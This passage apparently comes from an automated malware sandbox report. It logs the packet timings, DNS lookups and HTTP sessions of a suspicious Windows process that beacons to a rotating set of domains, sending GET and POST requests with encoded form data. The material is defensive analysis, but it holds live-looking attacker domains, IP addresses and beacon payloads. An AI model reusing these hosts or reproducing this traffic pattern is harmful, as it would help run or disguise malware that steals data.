                                                                Dec 11, 2024 15:05:11.538536072 CET8049989103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:12.922549009 CET4998980192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:12.978686094 CET8049989103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:12.978710890 CET8049989103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:12.978724957 CET8049989103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:12.978758097 CET4998980192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:12.978790998 CET4998980192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:12.981611967 CET4998980192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:13.042185068 CET8049989103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:13.042241096 CET4998980192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:13.940953970 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:14.060600042 CET8049990103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:14.060883999 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:14.074532986 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:14.194446087 CET8049990103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:14.194493055 CET8049990103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:15.578838110 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:15.634196997 CET8049990103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:15.634242058 CET8049990103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:15.634279966 CET8049990103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:15.634319067 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:15.634375095 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:15.637639999 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:15.698719978 CET8049990103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:15.698945999 CET4999080192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:16.619476080 CET4999180192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:16.739367962 CET8049991103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:16.739479065 CET4999180192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:16.748859882 CET4999180192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:16.868613958 CET8049991103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:18.320144892 CET8049991103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:18.320209980 CET8049991103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:18.320254087 CET8049991103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:18.320393085 CET4999180192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:18.320462942 CET4999180192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:18.323905945 CET4999180192.168.2.7103.75.185.22
                                                                Dec 11, 2024 15:05:18.443568945 CET8049991103.75.185.22192.168.2.7
                                                                Dec 11, 2024 15:05:23.741909027 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:23.861423016 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:23.861525059 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:23.873699903 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:23.993215084 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110471964 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110522032 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110558033 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110594034 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110598087 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.110630989 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110647917 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.110663891 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110697985 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110718012 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.110732079 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110778093 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.110778093 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110805988 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.110850096 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.230357885 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.230613947 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.230678082 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.234658957 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.234694004 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.234827042 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.308602095 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.308656931 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.308702946 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.311192989 CET8049992162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:25.311239958 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:25.375761986 CET4999280192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:26.394182920 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:26.514117956 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:26.514261961 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:26.526210070 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:26.645689964 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755522013 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755563974 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755578995 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755597115 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755606890 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.755620003 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755642891 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.755656958 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755672932 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755686998 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755693913 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.755748987 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.755826950 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755842924 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.755877018 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.875495911 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.875552893 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.875818968 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.879467010 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.922646999 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.947765112 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.947871923 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.948050976 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:27.950249910 CET8049993162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:27.950316906 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:28.040183067 CET4999380192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:29.050378084 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:29.170152903 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:29.170305014 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:29.183300972 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:29.302949905 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:29.303024054 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482270002 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482325077 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482383966 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482418060 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482453108 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482484102 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.482484102 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.482513905 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482552052 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482561111 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.482665062 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482697964 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482712984 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.482733965 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.482780933 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.603434086 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.603507042 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.603562117 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.606111050 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.656892061 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.673841000 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.673932076 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.673975945 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.676430941 CET8049994162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:30.676481009 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:30.688224077 CET4999480192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:31.706547976 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:31.826332092 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:31.826437950 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:31.834573984 CET4999580192.168.2.7162.0.213.94
                                                                Dec 11, 2024 15:05:31.954190016 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099076033 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099139929 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099172115 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099205971 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099240065 CET8049995162.0.213.94192.168.2.7
                                                                Dec 11, 2024 15:05:33.099272966 CET8049995162.0.213.94192.168.2.7
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 11, 2024 15:03:31.384685040 CET | 192.168.2.7 | 1.1.1.1 | 0x84af | Standard query (0) | www.supernutra01.online | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:03:48.456815958 CET | 192.168.2.7 | 1.1.1.1 | 0xfc52 | Standard query (0) | www.prestigerugz.info | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:03.519649029 CET | 192.168.2.7 | 1.1.1.1 | 0x8094 | Standard query (0) | www.buckser.info | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:12.362792015 CET | 192.168.2.7 | 1.1.1.1 | 0x5ac7 | Standard query (0) | www.jijievo.site | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:27.754096031 CET | 192.168.2.7 | 1.1.1.1 | 0xc05d | Standard query (0) | www.44ynh.top | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:42.988941908 CET | 192.168.2.7 | 1.1.1.1 | 0x3ae9 | Standard query (0) | www.setwayidiomas.online | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:51.566406012 CET | 192.168.2.7 | 1.1.1.1 | 0x2e6 | Standard query (0) | www.75178.club | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:52.578962088 CET | 192.168.2.7 | 1.1.1.1 | 0x2e6 | Standard query (0) | www.75178.club | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:05:06.920073986 CET | 192.168.2.7 | 1.1.1.1 | 0xc21f | Standard query (0) | www.taxitayninh365.site | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:05:07.938330889 CET | 192.168.2.7 | 1.1.1.1 | 0xc21f | Standard query (0) | www.taxitayninh365.site | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:05:23.331969023 CET | 192.168.2.7 | 1.1.1.1 | 0xdc1e | Standard query (0) | www.ontherise.top | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:05:38.817257881 CET | 192.168.2.7 | 1.1.1.1 | 0x23a8 | Standard query (0) | www.nb-shenshi.buzz | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 11, 2024 15:03:31.805080891 CET | 1.1.1.1 | 192.168.2.7 | 0x84af | No error (0) | www.supernutra01.online | | 104.21.24.198 | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:03:31.805080891 CET | 1.1.1.1 | 192.168.2.7 | 0x84af | No error (0) | www.supernutra01.online | | 172.67.220.36 | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:03:49.104902983 CET | 1.1.1.1 | 192.168.2.7 | 0xfc52 | No error (0) | www.prestigerugz.info | | 217.160.0.113 | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:04.299076080 CET | 1.1.1.1 | 192.168.2.7 | 0x8094 | Name error (3) | www.buckser.info | none | none | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:13.010793924 CET | 1.1.1.1 | 192.168.2.7 | 0x5ac7 | No error (0) | www.jijievo.site | all.wjscdn.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 11, 2024 15:04:13.010793924 CET | 1.1.1.1 | 192.168.2.7 | 0x5ac7 | No error (0) | all.wjscdn.com | | 154.90.58.209 | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:13.010793924 CET | 1.1.1.1 | 192.168.2.7 | 0x5ac7 | No error (0) | all.wjscdn.com | | 154.205.143.51 | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:13.010793924 CET | 1.1.1.1 | 192.168.2.7 | 0x5ac7 | No error (0) | all.wjscdn.com | | 154.205.156.26 | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:13.010793924 CET | 1.1.1.1 | 192.168.2.7 | 0x5ac7 | No error (0) | all.wjscdn.com | | 154.205.159.116 | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:13.010793924 CET | 1.1.1.1 | 192.168.2.7 | 0x5ac7 | No error (0) | all.wjscdn.com | | 38.54.112.227 | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:13.010793924 CET | 1.1.1.1 | 192.168.2.7 | 0x5ac7 | No error (0) | all.wjscdn.com | | 154.90.35.240 | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:28.346561909 CET | 1.1.1.1 | 192.168.2.7 | 0xc05d | No error (0) | www.44ynh.top | 44ynh.top | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 11, 2024 15:04:28.346561909 CET | 1.1.1.1 | 192.168.2.7 | 0xc05d | No error (0) | 44ynh.top | | 38.181.21.178 | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:43.505918026 CET | 1.1.1.1 | 192.168.2.7 | 0x3ae9 | Server failure (2) | www.setwayidiomas.online | none | none | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:52.715225935 CET | 1.1.1.1 | 192.168.2.7 | 0x2e6 | No error (0) | www.75178.club | uaslkd.skasdhu.huhusddfnsuegcdn.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 11, 2024 15:04:52.715225935 CET | 1.1.1.1 | 192.168.2.7 | 0x2e6 | No error (0) | uaslkd.skasdhu.huhusddfnsuegcdn.com | gtml.huksa.huhusddfnsuegcdn.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 11, 2024 15:04:52.715225935 CET | 1.1.1.1 | 192.168.2.7 | 0x2e6 | No error (0) | gtml.huksa.huhusddfnsuegcdn.com | | 23.167.152.41 | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:04:52.715866089 CET | 1.1.1.1 | 192.168.2.7 | 0x2e6 | No error (0) | www.75178.club | uaslkd.skasdhu.huhusddfnsuegcdn.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 11, 2024 15:04:52.715866089 CET | 1.1.1.1 | 192.168.2.7 | 0x2e6 | No error (0) | uaslkd.skasdhu.huhusddfnsuegcdn.com | gtml.huksa.huhusddfnsuegcdn.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 11, 2024 15:04:52.715866089 CET | 1.1.1.1 | 192.168.2.7 | 0x2e6 | No error (0) | gtml.huksa.huhusddfnsuegcdn.com | | 23.167.152.41 | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:05:08.622771025 CET | 1.1.1.1 | 192.168.2.7 | 0xc21f | No error (0) | www.taxitayninh365.site | taxitayninh365.site | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 11, 2024 15:05:08.622771025 CET | 1.1.1.1 | 192.168.2.7 | 0xc21f | No error (0) | taxitayninh365.site | | 103.75.185.22 | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:05:08.622790098 CET | 1.1.1.1 | 192.168.2.7 | 0xc21f | No error (0) | www.taxitayninh365.site | taxitayninh365.site | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 11, 2024 15:05:08.622790098 CET | 1.1.1.1 | 192.168.2.7 | 0xc21f | No error (0) | taxitayninh365.site | | 103.75.185.22 | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:05:23.737951040 CET | 1.1.1.1 | 192.168.2.7 | 0xdc1e | No error (0) | www.ontherise.top | | 162.0.213.94 | A (IP address) | IN (0x0001) | false |
| Dec 11, 2024 15:05:39.444376945 CET | 1.1.1.1 | 192.168.2.7 | 0x23a8 | No error (0) | www.nb-shenshi.buzz | | 161.97.168.245 | A (IP address) | IN (0x0001) | false |
                                                                • www.supernutra01.online
                                                                • www.prestigerugz.info
                                                                • www.jijievo.site
                                                                • www.44ynh.top
                                                                • www.75178.club
                                                                • www.taxitayninh365.site
                                                                • www.ontherise.top
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.7 | 49819 | 104.21.24.198 | 80 | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe |

Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 15:03:31.938921928 CET | 501 | OUT | GET /q3v1/?rLx0p=06jDTp00Q&9rKHjDxP=fC5DX2ZaB+U22tqYS+31DCM0Vrm4Elo0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfcmXJHPof67iEk5v1Y4XZGEVpYnTZiVigeHb+dSitYw1T+PjPtStOlFWH8 HTTP/1.1
                                                                Host: www.supernutra01.online
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Dec 11, 2024 15:03:33.292248964 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                Date: Wed, 11 Dec 2024 14:03:33 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Last-Modified: Tue, 24 Sep 2024 07:18:31 GMT
                                                                Accept-Ranges: bytes
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VxaeBUiAYCAoC1iXM%2Fqx82t32rgDE9jqZkvf%2BYKjDQEIDVzVx6KcUcrbdPS%2BPqSe4yV6yQO9wSjdlxUOa0lvOfVrbpjYXBZv2uvG99jb2fiy7W6Y9MeDzGfkzmhTwSyln7LfZYbKt6SGlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8f0604ca7f1d5e70-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1561&rtt_var=780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=501&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,l
Dec 11, 2024 15:03:33.292359114 CET | 224 | IN
                                                                Data Ascii: abel{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}bo
Dec 11, 2024 15:03:33.292371035 CET | 1236 | IN
                                                                Data Ascii: dy{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#000}butt
Dec 11, 2024 15:03:33.292484045 CET | 1236 | IN
                                                                Data Ascii: weight:500;line-height:1.2777777778}.window-main__title::before{content:"";position:absolute;bottom:0;left:50%;height:2px;width:8rem;background-color:#15b4fc;-webkit-transform:translateX(-50%);transform:translateX(-50%)}.window-main__body{line
Dec 11, 2024 15:03:33.292690992 CET | 448 | IN
                                                                Data Ascii: {margin-bottom:1.5rem}.window-main__list{padding-left:.5625rem}.window-main__item{padding-left:.75rem}.window-main__actions{margin-top:1.5rem}}@media (max-width:29.99875em){.window-main .svg-one{top:-330px}.window-main .svg-two{bottom:-423px;l
Dec 11, 2024 15:03:33.292704105 CET | 1236 | IN
                                                                Data Ascii: 29.0243902439vw ,8.9375rem)}}@supports not (padding-left:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-left:calc(1.5rem + 7.4375*(100vw - 20rem)/ 25.625)}}@supports (padding-right:clamp(1.5rem ,-4.304878048
Dec 11, 2024 15:03:33.292714119 CET | 1236 | IN
                                                                Data Ascii: 9268292683vw ,2.25rem)){.window-main__title{font-size:clamp(1.5rem ,.9146341463rem + 2.9268292683vw ,2.25rem)}}@supports not (font-size:clamp(1.5rem ,0.9146341463rem + 2.9268292683vw ,2.25rem)){.window-main__title{font-size:calc(1.5rem + .75*(
Dec 11, 2024 15:03:33.292726994 CET | 1236 | IN
                                                                Data Ascii: -left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:clamp(0.75rem ,0.6524390244rem + 0.487804878vw ,0.875rem)){.window-main__item{padding-left:clamp(.75rem ,.6524390244rem + .487804878vw ,.875rem)}}@supports not (paddi
Dec 11, 2024 15:03:33.292740107 CET | 1236 | IN
                                                                Data Ascii: 74 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.696 231.133 363.018 262.356 381.991 328.99C287.99 418.472 360.522 563.421 360.522 563.421Z" fill="#00498D" /></g><g opacity="0.7" filter="url(#filter1_f_2001_5)">
Dec 11, 2024 15:03:33.292753935 CET | 1236 | IN
                                                                Data Ascii: "426.142" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><
Dec 11, 2024 15:03:33.412276030 CET | 1236 | IN
                                                                Data Ascii: but the site does not have an SSL certificate installed.</li><li class="window-main__item">Your domain has an AAAA record, but the site only works with IPv4 on the server.</li></ul></div><div class="window-main__acti


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.7 | 49859 | 217.160.0.113 | 80 | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe |

Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 15:03:49.239543915 CET | 769 | OUT | POST /m5si/ HTTP/1.1
                                                                Host: www.prestigerugz.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 221
                                                                Origin: http://www.prestigerugz.info
                                                                Referer: http://www.prestigerugz.info/m5si/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Ascii: 9rKHjDxP=TowXiW7yiZaI+50bV3iKIwsZ8NTKLlySH774ZLEEHnK9J16PPjRS7fWelzRlHXITpq7irjWQDqzLNI6anaIslk/78z/PtvTyycRgpk0KsU5Y8xu6zdwwLvnCm42ycO5tvAHv0zqf2i37cu19HrUCKBOK+ia5zmDgzTHMFt223gtXWdg0k62bHJ2YvwOBSSsINNtIBbbCppEGMwz2yw==
Dec 11, 2024 15:03:50.512629986 CET | 780 | IN | HTTP/1.1 404 Not Found
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Date: Wed, 11 Dec 2024 14:03:50 GMT
                                                                Server: Apache
                                                                X-Frame-Options: deny
                                                                Content-Encoding: gzip


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.7 | 49868 | 217.160.0.113 | 80 | 4508 | C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe |

Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 15:03:51.908502102 CET | 789 | OUT | POST /m5si/ HTTP/1.1
                                                                Host: www.prestigerugz.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 241
                                                                Origin: http://www.prestigerugz.info
                                                                Referer: http://www.prestigerugz.info/m5si/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
